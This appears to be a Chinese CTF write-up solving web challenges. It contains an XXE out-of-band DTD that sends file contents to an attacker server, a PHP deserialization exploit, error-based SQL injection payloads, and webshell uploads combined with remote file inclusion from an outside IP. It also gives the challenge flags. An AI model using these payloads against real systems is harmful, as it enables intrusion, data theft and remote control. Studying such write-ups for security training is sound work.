web

有来无回

考察xxe盲注
参考博客：https://blog.csdn.net/m0_49623330/article/details/113641498

<!ENTITY % a SYSTEM "http://vps/test.dtd">

%a;
] >
在自己服务器上编写dtd文件

<!ENTITY % dtd "<!ENTITY % hack SYSTEM 'http://vps:1234/%file;'> ">

%dtd;
%hack;

发包 监听

Base64在线解密
flag{tqxh8rvijg4jibuxuzfaarvq8esu24uz}

反败为胜

查看源代码：rc4加密，密码0626，

在线网站解码得到源码，

<?php echo("ser.php: You find me!"); class ouo{ private $ser_code = "ser"; function __destruct(){ if(!empty($this->ser_code)) { if($this->ser_code == "FLAG") echo ("{flag}"); else die('Try Again!'); }} function __wakeup(){ $this->ser_code=null; } } $ser_code = $_COOKIE['SER']; unserialize($ser_code); ?>

考察反序列化，编写exp：

<?php class ouo{ private $ser_code = "FLAG"; } $hack = new ouo(); $a = serialize($hack); $b = str_replace(':1:', ':2:',$a); echo urlencode($b); ?>

运行得到

O%3A3%3A%22ouo%22%3A2%3A%7Bs%3A13%3A%22%00ouo%00ser_code%22%3Bs%3A4%3A%22FLAG%22%3B%7D

访问ser.php，抓包
在cookie上传SER, 发包得到flag。

SQL

参考梦想CMS注入:http://www.hackdig.com/07/hack-724362.htm

查询表名
’ or updatexml(0,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1) #

%2527%2520or%2520updatexml(0%252Cconcat(0x7e%252C(select(group_concat(table_name))from(information_schema.tables)where(table_schema%253Ddatabase())))%252C1)%2520%2523

is_this_flag
查询字段名
’ or updatexml(0,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name=0x69735f746869735f666c6167))),1) #
%2527%2520or%2520updatexml(0%252Cconcat(0x7e%252C(select(group_concat(column_name))from(information_schema.columns)where(table_name%253D0x69735f746869735f666c6167)))%252C1)%2520%2523

flag

查询字段内容
’ or updatexml(0,concat(0x7e,(select(group_concat(flag))from(is_this_flag)where(1=1))),1) #

%2527%2520or%2520updatexml(0%252Cconcat(0x7e%252C(select(group_concat(flag))from(is_this_flag)where(1%253D1)))%252C1)%2520%2523

flag{e4cf1b90-75d1-11ed-9b3b-44

’ or updatexml(0,concat(0x7e,(select(reverse(flag))from(is_this_flag)where(1=1))),1) #

%2527%2520or%2520updatexml(0%252Cconcat(0x7e%252C(select(reverse(flag))from(is_this_flag)where(1%253D1)))%252C1)%2520%2523

}73257a82fa44-b3b9-de11-1d57-09

得到完整flag
flag{e4cf1b90-75d1-11ed-9b3b-44af28a75237}

Skip

原题
参考：https://hackinguko.tistory.com/30

脚本直接运行

flag{abe2ff50ebbc889f8b341fa53fd792e3}

eZphp

目录扫描发现index.php.bak
关键代码

上传一句话木马

http://59.110.213.14:41039/?f[name=4.php
POST:
f[content=<?php include$_GET[a];

远程文件包含

http://59.110.213.14:41039/4.php?a=http://81.69.221.177/9.txt
蚁剑连接

eZphp2

打开题目环境

写入一句话木马
http://59.110.213.14:47431/index.php?name[nnnn=1.php
POST:
file_c=<?=eval($_GET[a]);

http://59.110.213.14:47431/Upld0d/1.php?a=eval($_POST[1]);
蚁剑连接得到flag

flag{ff8f5e93-3169-4f39-b3a0-0ee692f96256}